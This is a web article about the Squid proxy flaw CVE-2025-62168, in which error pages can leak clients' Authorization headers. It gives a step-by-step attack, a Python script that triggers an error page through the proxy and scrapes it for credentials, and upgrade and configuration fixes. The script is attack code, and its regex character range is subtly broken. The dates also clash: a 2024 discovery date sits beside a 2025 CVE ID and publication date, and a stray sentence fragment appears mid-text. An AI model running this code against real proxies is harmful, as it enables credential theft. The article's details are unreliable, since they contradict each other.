CVE CyberSecurity Database News

CVE-2025-62168 - Squid Proxy Authentication Leak – How Attackers Steal Your Secrets (With Example & Fix)

Poster -

On June 10, 2024, a new security issue was discovered impacting Squid, the widely-used web caching proxy. Identified as CVE-2025-62168, this vulnerability allows attackers to steal sensitive authentication credentials that pass through the proxy — even if you have *not* enabled authentication in Squid. Let’s go through how it happens, why it’s dangerous, and how you can protect your environment.

What is Squid?

Squid is a popular, open-source proxy server for caching web content. Organizations use it to cut bandwidth usage, speed up web requests, and sometimes to enable security functions.

What is CVE-2025-62168?

CVE-2025-62168 is an information disclosure flaw found in Squid versions before 7.2. Here’s what happens:
- If Squid encounters an error serving a request, it may include the *client’s HTTP authentication credentials* in the error page data.
- A malicious script or attacker could trigger such errors and scrape those credentials from the error page.

Those credentials might be for internal webapps, APIs, or other sensitive backend connections.

This attack works even if Squid is not configured to require authentication. The flaw is in how Squid builds error responses.

Use stolen credentials to further penetrate your network.

If someone can interact with your proxy — maybe via a web-facing service or a compromised script — they can extract credentials you thought were safe behind the scenes.

Attack Scenario

Imagine your backend web application is load-balanced behind Squid. A remote user (legit or not) can trick Squid into generating error messages for their requests. If those requests contain authentication headers (like Authorization: Basic ...), those headers may be sent back in the error response. A script running in a browser or by API automation can parse out those secrets.

Exploitation Example

Let's say you have Squid running (prior to 7.2), and a backend that uses Basic Authentication. Here’s a simplified attack sequence:

Step 1: The attacker crafts a request that will cause Squid to generate an error (e.g., requesting a non-existent backend).

Step 2: Squid tries to fulfill the request, fails, and generates an error page.

Step 3: If the client sent any Authorization header (browser or script), it can end up inside the error page data.

Step 4: The attacker snags the credentials from the reply.

Sample Attack Code

Here’s a basic Python snippet demonstrating this attack. It forges an Authorization header, sends a request that triggers an error, and parses the response to extract any leaked secrets:

import requests
import base64
import re

# Credentials are base64-encoded user:password
user = "trusted-user"
password = "SuperSecret123"
b64_credentials = base64.b64encode(f'{user}:{password}'.encode()).decode()

# URL that will cause an error (e.g., non-existent page)
proxy_url = "http://squid-proxy:3128";
target_url = "http://backend.internal/does-not-exist";

proxies = {
    "http": proxy_url,
    "https": proxy_url,
}

headers = {
    "Authorization": f"Basic {b64_credentials}"
}

resp = requests.get(target_url, headers=headers, proxies=proxies)
print("Error page content:\n", resp.text)

# Look for credential leakage in the error page
leaked = re.findall(r'Authorization: (Basic [A-Za-z-9+/=]+)', resp.text)
if leaked:
    print("Leaked credentials found in error page:", leaked)

Result:
If vulnerable, the error page Squid returns might *embed your Authorization header*, which the script extracts.

Upgrade Squid

The vulnerability is fully patched in Squid 7.2.

- Upgrade to Squid 7.2 (Release Notes)

Workaround for Older Installations

If you cannot upgrade Squid right away, you can cut off the leak with a setting in your squid.conf:

# Add this to squid.conf to strip debug info (including accidental headers) from error mails/links:
email_err_data off

This disables debug info (which could include header data) in admin error messages Squid generates.

References

- Squid Security Advisory: SQUID-2024:7
- Debian Security Tracker - CVE-2025-62168
- Squid main site

TL;DR

- CVE-2025-62168 lets attackers grab internal HTTP credentials from Squid error pages, even if you don’t use proxy auth.

Timeline

Published on: 10/17/2025 17:15:49 UTC
Last modified on: 11/05/2025 17:15:45 UTC